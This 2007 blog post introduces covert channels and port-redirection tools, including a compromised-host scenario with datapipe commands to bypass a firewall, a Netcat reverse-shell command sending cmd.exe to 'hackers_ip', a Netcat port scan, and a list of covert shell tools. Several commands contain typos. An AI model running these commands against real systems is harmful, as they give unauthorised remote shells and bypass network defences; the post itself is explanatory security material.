Saturday, December 8, 2007

Covert Communication Tools

Covert Communication Tools
PART 1 INTRODUCTION

The Trusted Computer System Evaluation Criteria (TCSEC) historically was one of the first documents to fully examine the concept of covert communications and attacks.

TCSEC basically divides covert channel attacks into 2 broad categories:-
• Covert timing channel attacks – Timing attacks are difficult to detect, as they are based on system times and function by altering a component or by modifying resource timing.
• Covert storage channel attacks – Uses one process to write data to a storage area and another process to read the data.

In the world of hacking, covert communication is accomplish through a “covert channel”. A covert channel is a way of moving information through a communication channel or protocol in a manner in which it was not intended to be used. For an ethical hacker who performs attack and penetration assessments, such tools are important because hackers can use them to obtain an initial foothold into an otherwise secure network. For the network administrator, understanding how these tools work and their fingerprints can help them recognize potential entry points into the network. For the naughty hacker, it’s a powerful tool that can potentially allow him control and access.

You must be saying: I NEED THE TOOLS NOT EXPLANATIONS? Hehe Wana know! Wana know! Oki first of all let me complete short explanation then we gonna touch up on the tools section. Well, the design of TCP/IP can offer many opportunities for misuse. Did u know this? hehe Moving on, the protocols for covert communications can include Internet Protocol (IP), TCP, UDP, and ICMP.
PART 2 COVERT COMMUNICATION TOOLS

How a tool such as ping can be misused for covert communications? Here we will focus on tools designed for making covert communications easy.

(i) Port Redirection

For a packet to reach its destination, it must have an IP address and a port number. Ports range from 0-65535. Most applications use well-known ports. For example, DNS uses 53, whereas HTTP uses 80. Port redirection works by listening on certain ports and then forwarding the packets to a secondary target. Some of the tools used for port redirection include datapipe, fpipe, and Netcat. What is great about all 3 of these tools is that they are protocol ignorant. They don’t care what you pass. Port redirections simply act as the pipe to more data from point A to point B.

Datapipe is a UNIX port redirection tool. The syntax to use datapipe is straightforward:

datapipe

For example, the naughty hacker has compromised a Linux host 10.2.2.254 on the inside of the network and has uploaded the datapipe application. Now, the hacker would like to set up a null session to Windows systems (10.2.2.2) inside the compromised network. The problem is that the firewall is blocking port 139. Therefore, there is no direct way for the hacker to set up a null session. That’s where datapipe come in.
From the compromised Linux system, the hacker would run the following command:

Datapipe 80 139 10.2.2.2

On the hacker’s local Linux system, he would enter:

Datapipe 139 80 10.2.2.254

Note: Netcat is also useful for port redirection.

For example, if Netcat is available on the victim’s system, it can be used similar to datapipe and fpipe. You can actually shovel the shell directly back to the hacker system. First, the hacker would need to set up a listener on his system, as follows:

Nc -n -v -1 -p 80

Next, the hacker would enter the following command from the victim’s system:

Nc -n hackers_ip 80 -e “cmd.exe”

After being entered, this would shovel the shell for the victim’s system to the hacker’s open command prompt. Netcat can be used for many other purposes such as port scanning and uploading files. To port scan:

nc -v -z -w1 IPaddress 1 -1024

This command would port scan the target IP address.

***Meanings of symbols***

-v option means verbose
-z is used for port scanning
-w1 means wait one second before timing out
1-1024 is the range of TCP ports to be scanned
OTHER REDIRECTION and COVERT TOOLS

The following tools can use ICMP, TCP or even IGRP:-
• Loki – designed to show how ICMP traffic can be insecure and dangerous
• ICMP backdoor – has the advantage of using only ping reply packets
• 007Shell
• B0CK –
• Reverse WWW Tunneling Shell
• AckCmd – is a covert channel program that provides a command shell on Windows systems. It communicates using only TCP ACK segments. This way, the client component is capable of directly contacting the server component through routers with ACLs in place to block traffic.

Note: I have just given a short overview of “Covert Communication Tools”. For in depth knowledge about these tools and how to apply these tools in a real life situation pliz do google search and do personal readings coz it is impossible to explain all tha tools in depth here coz tha explanations are too long.